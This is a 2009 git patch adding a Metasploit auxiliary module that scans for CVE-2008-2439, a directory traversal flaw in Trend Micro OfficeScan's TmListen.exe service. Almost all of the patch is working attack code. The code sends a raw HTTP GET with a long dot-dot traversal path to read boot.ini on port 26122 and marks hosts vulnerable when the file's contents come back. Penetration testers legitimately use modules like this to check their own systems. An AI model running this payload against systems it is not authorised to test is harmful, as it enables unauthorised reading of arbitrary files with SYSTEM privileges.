From a2da72c0eb9707997d029ef6b87332ba436490dc Mon Sep 17 00:00:00 2001
From: Patrick Webster <patrick@aushack.com>
Date: Mon, 5 Jan 2009 05:18:42 +0000
Subject: [PATCH] Added tmlisten_traversal aux module from Anshul Pandey.

git-svn-id: file:///home/svn/framework3/trunk@6075 4d416f70-5f16-0410-b530-b9f4589650da
---
 .../admin/officescan/tmlisten_traversal.rb    | 66 +++++++++++++++++++
 1 file changed, 66 insertions(+)
 create mode 100644 modules/auxiliary/admin/officescan/tmlisten_traversal.rb

diff --git a/modules/auxiliary/admin/officescan/tmlisten_traversal.rb b/modules/auxiliary/admin/officescan/tmlisten_traversal.rb
new file mode 100644
index 0000000000..64edd3cd2a
--- /dev/null
+++ b/modules/auxiliary/admin/officescan/tmlisten_traversal.rb
@@ -0,0 +1,66 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to 
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/projects/Framework/
+##
+
+
+require 'msf/core'
+
+
+class Metasploit3 < Msf::Auxiliary
+	
+	include Msf::Exploit::Remote::HttpClient
+	include Msf::Auxiliary::Scanner
+
+	def initialize
+		super(
+			'Name'        => 'TrendMicro OfficeScanNT Listener Traversal Arbitrary File Access',
+			'Version'     => '$Revision$',
+			'Description' => %q{
+				This module tests for directory traversal vulnerability in the UpdateAgent
+				function in the OfficeScanNT Listener (TmListen.exe) service in Trend Micro
+				OfficeScan. This allows remote attackers to read arbitrary files as SYSTEM
+				via dot dot sequences in a HTTP request.
+			},
+			'References'  =>
+				[
+					[ 'OSVDB', '48730' ],
+					[ 'CVE', '2008-2439' ],
+					[ 'BID', '31531' ],
+					[ 'URL', 'http://www.trendmicro.com/ftp/documentation/readme/OSCE_7.3_Win_EN_CriticalPatch_B1372_Readme.txt' ],
+				],
+			'Author'      => [ 'Anshul Pandey <anshul999@gmail.com>', 'patrick' ],
+			'License'     => MSF_LICENSE
+		)
+
+		register_options(
+				[
+					Opt::RPORT(26122),
+				], self.class)
+	end
+
+	def run_host(target_host)
+
+		res = send_request_raw({
+			'uri'     => '/activeupdate/../../../../../../../../../../../boot.ini',
+			'method'  => 'GET',
+		}, 20)
+
+		if (res.code >= 200)
+			if (res.body =~ /boot/)
+				vuln = "vulnerable."
+			else
+				vuln = "not vulnerable."
+			end
+			if (res.headers['Server'])
+				print_status("http://#{target_host}:#{rport} is running #{res.headers['Server']} and is #{vuln}")
+			end
+		end
+	end
+end
\ No newline at end of file